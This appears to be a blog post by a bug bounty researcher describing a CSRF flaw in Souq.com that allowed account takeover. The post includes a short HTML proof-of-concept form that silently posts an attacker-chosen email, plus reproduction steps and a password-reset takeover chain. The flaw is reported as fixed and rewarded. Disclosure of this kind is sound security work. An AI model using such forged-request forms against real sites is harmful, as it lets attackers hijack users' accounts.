Account Takeover of All Souq.com users by Adding new Email(CSRF)

Hi All ,

Company Info :
Souq.com is an English-Arabic language e-commerce platform, often described as the Amazon of the Middle East.It is the largest e-commerce platform in the Arab world. On March 28, 2017, Amazon.com Inc. confirmed it would be acquiring Souq.com for $580 million

Bug Category and reference links :
Cross Site request forgery(CSRF)
link :https://www.owasp.org/index.php/Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF)

Technical Details of the Bug :
CSRF takes advantage the fact that most web apps allow attackers to predict all the details of a particular action.
Because browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.

Detection of CSRF flaws is fairly easy via penetration testing or code analysis.


About : 
It was in Last September when Souq.com was private program on hackerone. I started working on Souq.com and found that Site was vulnerable to CSRF attacks on many different Actions. This was one of the critical action which led to Takeover the account of any user of Souq.com .


HTML POC : 
<html>
<body>
<form action="https://sell.souq.com/profile-completion/saveEmail" method="POST">
<input type="hidden" name="email" value="[Valid_email]">
<input type="submit" >
</body>
</html>


Steps to reproduce :
1.Change the "email" post parameter to any email address which has not already been used.
2.Save this HTML file as .html and run this in your browser.
3.You will notice that the Email address will be changed.

Browser and Versions :
Google crome
Version : 52.0.2743.116

Impact :
If Attacker is able to add New email into Victim's account then he can go to forgot password page and Request the password to newly added Email . Now Attacker can change the password from his own Email account and takeover Victim's account.



TimeLine : 
September 4th : Report send to Souq.com Security Team through Hackerone
September 28th : Report Triaged by Team
September 30th : 1000$ Bounty Rewarded
Feb 2nd : The issue was resolved





I would like to Thank to Souq.com team for Fixing this serious issue .
Please feel free to comment if you have any questions regarding this issue.


Thanks !
Vijay Kumar

Comments

Popular posts from this blog

Airbnb : Steal Earning of Airbnb hosts by Adding Bank Account/Payment Method (IDOR)

Add Credit Card to Any Uber account Through eats.uber.com(CSRF)